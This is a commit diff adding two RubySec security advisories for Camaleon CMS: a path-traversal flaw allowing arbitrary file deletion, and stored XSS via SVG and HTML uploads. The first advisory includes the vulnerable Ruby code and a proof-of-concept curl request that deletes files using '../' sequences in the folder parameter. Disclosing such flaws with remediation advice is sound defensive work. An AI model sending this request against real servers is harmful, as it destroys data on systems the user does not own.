Updated advisory posts against rubysec/ruby-advisory-db@951c00b

jasnow · RubySec CI · commit d2b639783837 · 2024-09-23T18:52:15.000Z
diff --git a/advisories/_posts/2024-09-18-GHSA-7x4w-cj9r-h4v9.md b/advisories/_posts/2024-09-18-GHSA-7x4w-cj9r-h4v9.md
@@ -0,0 +1,89 @@
+---
+layout: advisory
+title: 'GHSA-7x4w-cj9r-h4v9 (camaleon_cms): Camaleon CMS vulnerable to remote code
+  execution through code injection (GHSL-2024-185)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  ghsa: 7x4w-cj9r-h4v9
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
+  title: Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185)
+  date: 2024-09-18
+  description: |
+    The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52)
+    defined inside of the MediaController class do not check whether a
+    given path is inside a certain path (e.g. inside the media folder).
+    If an attacker performed an account takeover of an administrator
+    account (See: GHSL-2024-184) they could delete arbitrary files or
+    folders on the server hosting Camaleon CMS. The
+    [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65)
+    action might make arbitrary file writes (similar impact to GHSL-2024-182)
+    for any authenticated user possible, but it doesn't seem to work currently.
+
+    Arbitrary file deletion can be exploited with following code path:
+    The parameter folder flows from the actions method:
+    ```ruby
+      def actions
+        authorize! :manage, :media if params[:media_action] != 'crop_url'
+        params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
+        case params[:media_action]
+        [..]
+        when 'del_file'
+          cama_uploader.delete_file(params[:folder].gsub('//', '/'))
+          render plain: ''
+    ```
+    into the method delete_file of the CamaleonCmsLocalUploader
+    class (when files are uploaded locally):
+    ```ruby
+    def delete_file(key)
+      file = File.join(@root_folder, key)
+      FileUtils.rm(file) if File.exist? file
+      @instance.hooks_run('after_delete', key)
+      get_media_collection.find_by_key(key).take.destroy
+    end
+    ```
+    Where it is joined in an unchecked manner with the root folder and
+    then deleted.
+
+    **Proof of concept**
+    The following request would delete the file README.md in the top
+    folder of the Ruby on Rails application. (The values for auth_token,
+    X-CSRF-Token and _cms_session would also need to be replaced with
+    authenticated values in the curl command below)
+    ```
+    curl --path-as-is -i -s -k -X $'POST' \
+        -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
+        -b $'auth_token=[..]; _cms_session=[..]' \
+        --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
+    2F..
+    2F..
+    2FREADME.md&media_action=del_file' \
+        $'https://<camaleon-host>/admin/media/actions?actions=true'
+    ```
+
+    **Impact**
+
+    This issue may lead to a defective CMS or system.
+
+    **Remediation**
+
+    Normalize all file paths constructed from untrusted user input
+    before using them and check that the resulting path is inside the
+    targeted directory. Additionally, do not allow character sequences
+    such as .. in untrusted input that is used to build paths.
+
+    **See also:**
+
+    [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
+    [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
+  cvss_v3: 7.2
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
+    - https://github.com/owen2345/camaleon-cms/commit/f5d032549fa0a204d06e738caf2663607967dee2
+    - https://github.com/advisories/GHSA-7x4w-cj9r-h4v9
+---
diff --git a/advisories/_posts/2024-09-18-GHSA-r9cr-qmfw-pmrc.md b/advisories/_posts/2024-09-18-GHSA-r9cr-qmfw-pmrc.md
@@ -0,0 +1,60 @@
+---
+layout: advisory
+title: 'GHSA-r9cr-qmfw-pmrc (camaleon_cms): Camaleon CMS vulnerable to stored XSS
+  through user file upload (GHSL-2024-184)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  ghsa: r9cr-qmfw-pmrc
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
+  date: 2024-09-18
+  description: |
+    A stored cross-site scripting has been found in the image upload
+    functionality that can be used by normal registered users:
+    It is possible to upload a SVG image containing JavaScript and
+    it's also possible to upload a HTML document when the format
+    parameter is manually changed to [documents][1] or a string of an
+    [unsupported format][2]. If an authenticated user or administrator
+    visits that uploaded image or document malicious JavaScript can be
+    executed on their behalf
+    (e.g. changing or deleting content inside of the CMS.)
+
+    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
+    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
+
+    ## Impact
+
+    This issue may lead to account takeover due to reflected
+    Cross-site scripting (XSS).
+
+    ## Remediation
+
+    Only allow the upload of safe files such as PNG, TXT and others
+    or serve all "unsafe" files such as SVG and other files with a
+    content-disposition: attachment header, which should prevent
+    browsers from displaying them.
+
+    Additionally, a [Content security policy (CSP)][3]
+    can be created that disallows inlined script. (Other parts of the
+    application might need modification to continue functioning.)
+
+    [3]: https://web.dev/articles/csp
+
+    To prevent the theft of the auth_token it could be marked with
+    HttpOnly. This would however not prevent that actions could be
+    performed as the authenticated user/administrator. Furthermore,
+    it could make sense to use the authentication provided by
+    Ruby on Rails, so that stolen tokens cannot be used anymore
+    after some time.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+    - https://github.com/owen2345/camaleon-cms/commit/b18fbc74f3ecd98a1f781d015f5466ef16b1425b
+    - https://github.com/advisories/GHSA-r9cr-qmfw-pmrc
+---
